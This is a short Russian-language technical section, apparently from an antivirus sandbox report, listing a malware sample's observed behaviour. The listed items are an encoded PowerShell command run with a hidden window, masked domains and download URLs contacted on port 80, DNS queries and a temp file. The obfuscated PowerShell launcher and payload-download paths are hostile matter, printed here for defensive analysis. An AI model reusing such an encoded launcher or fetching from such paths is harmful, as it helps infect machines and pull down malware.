Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGUAYgByAGkAbwB4AGsAYQB1AG4APQAnAGIAbwBnAGwAbwBvAHQAcQB1AGkAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIASQB0AFkAUABgAFIAYABvAHQATwBgAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\797461.cvr
- 'ci###aft.net':80
- 'cl####cpaint.net':80
- 'ho####ishops.com':80
- http://ci###aft.net/anticheat/3wj3/
- http://cl####cpaint.net/wp-content/ssc/
- http://ho####ishops.com/test/home/mcg3/
- DNS ASK ci###aft.net
- DNS ASK cl####cpaint.net
- DNS ASK ga####lfelipe.com
- DNS ASK hh##nz.eu
- DNS ASK ho####ishops.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB4AGUAYgByAGkAbwB4AGsAYQB1AG4APQAnAGIAbwBnAGwAbwBvAHQAcQB1AGkAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwB1AHIASQB0AFkAUABgAFIAYABvAHQATwBgAG... (со скрытым окном)